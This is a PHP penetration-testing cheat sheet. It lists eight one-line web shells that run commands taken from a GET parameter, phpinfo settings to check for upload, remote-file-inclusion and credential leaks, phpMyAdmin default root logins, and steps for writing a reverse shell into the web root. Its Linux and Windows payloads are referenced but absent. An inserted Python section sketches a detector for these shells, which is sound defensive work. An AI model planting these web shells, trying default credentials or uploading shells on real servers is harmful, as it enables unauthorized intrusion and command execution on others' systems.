PHP

Reverse Shells

shell_exec

<?php echo shell_exec($_GET['cmd']); ?>

exec

<?php echo exec($_GET['cmd']); ?>

system

<?php echo system($_GET['cmd']); ?>

pass-through

<?php echo passthru($_GET['cmd']); ?>

back-ticks

<?php echo `{$_GET['cmd']}`; ?>

URL-encoded

<?php echo shell_exec(urldecode($_GET['cmd'])); ?>

HTML-encoded

<?php echo htmlspecialchars(shell_exec($_GET['cmd'])); ?>

Input sanitization

<?php
$cmd = escapeshellcmd($_GET['cmd']);
echo shell_exec($cmd);
?>
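
A defender's view of the variants above, as an added example that is not part of the original page: a Python heuristic that flags PHP source where request input reaches a command-execution call or the backtick operator, including through wrappers and an intermediate variable. The function names and sample files are constructed for illustration.

```python
import re

# Request-controlled sources and the command-execution sinks used by the one-liners above.
SOURCE = re.compile(r"\$_(?:GET|POST|REQUEST|COOKIE)\b")
# The lookbehind skips method calls ($pdo->exec) and longer names (curl_exec).
CALL = re.compile(r"(?<![\w>:$])(?:shell_exec|exec|system|passthru|popen|proc_open)\s*\(([^;]*)")
BACKTICK = re.compile(r"`([^`]*)`")
ASSIGN = re.compile(r"(\$\w+)\s*=(?![=>])\s*([^;]*);")


def is_tainted(expr, tainted):
    """True if expr mentions a request superglobal or an already-tainted variable."""
    return bool(SOURCE.search(expr)) or any(
        re.search(re.escape(v) + r"\b", expr) for v in tainted)


def find_webshell_sinks(php):
    """Return (kind, snippet) for each sink fed by request input.

    Heuristic: one forward pass, no scoping or function tracking. Wrappers such
    as urldecode() or escapeshellcmd() do not clear taint, because the requester
    still chooses which command runs.
    """
    tainted = set()
    for name, expr in ASSIGN.findall(php):
        if is_tainted(expr, tainted):
            tainted.add(name)
    hits = [("call", m.group(0)) for m in CALL.finditer(php)
            if is_tainted(m.group(1), tainted)]
    hits += [("backtick", m.group(0)) for m in BACKTICK.finditer(php)
             if is_tainted(m.group(1), tainted)]
    return hits


# Constructed samples: two variants from the list above and one benign file.
SAMPLES = {
    "via_variable.php": "<?php\n$cmd = escapeshellcmd($_GET['cmd']);\necho shell_exec($cmd);\n?>",
    "backtick.php": "<?php echo `{$_GET['cmd']}`; ?>",
    "benign.php": "<?php $out = shell_exec('uptime'); echo htmlspecialchars($_GET['q']); ?>",
}

if __name__ == "__main__":
    for name, src in SAMPLES.items():
        print(name, find_webshell_sinks(src))
```

Run it over the web root and upload directories; any hit in a file that is not part of the deployed application deserves a look.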

PHPinfo
  • file_uploads ⇒ if On, search for upload functionality and the upload directory

  • DOCUMENT_ROOT ⇒ discloses the path of uploaded files

  • Architecture ⇒ to upload a reverse shell on Windows, we need the architecture info

  • allow_url_include ⇒ if On, we can perform RFI

  • $_SERVER['AUTH_USER'] || $_SERVER['AUTH_PASSWORD'] ⇒ database credentials

phpMyAdmin

Authentication

Try the default credentials of phpMyAdmin:

username : root
password : [null]

username : root
password : password

Reverse shell upload

To know where to upload the reverse shell, check DOCUMENT_ROOT in phpinfo (DOCUMENT_ROOT C:/wamp/www).

Linux

Windows

If the above payload does not work, also try these quoting combinations:

  1. single quote : php-rev_shell & single quote : into-outfile-path

  2. single quote : php-rev_shell & double quote : into-outfile-path

  3. double quote : php-rev_shell & single quote : into-outfile-path

  4. double quote : php-rev_shell & double quote : into-outfile-path
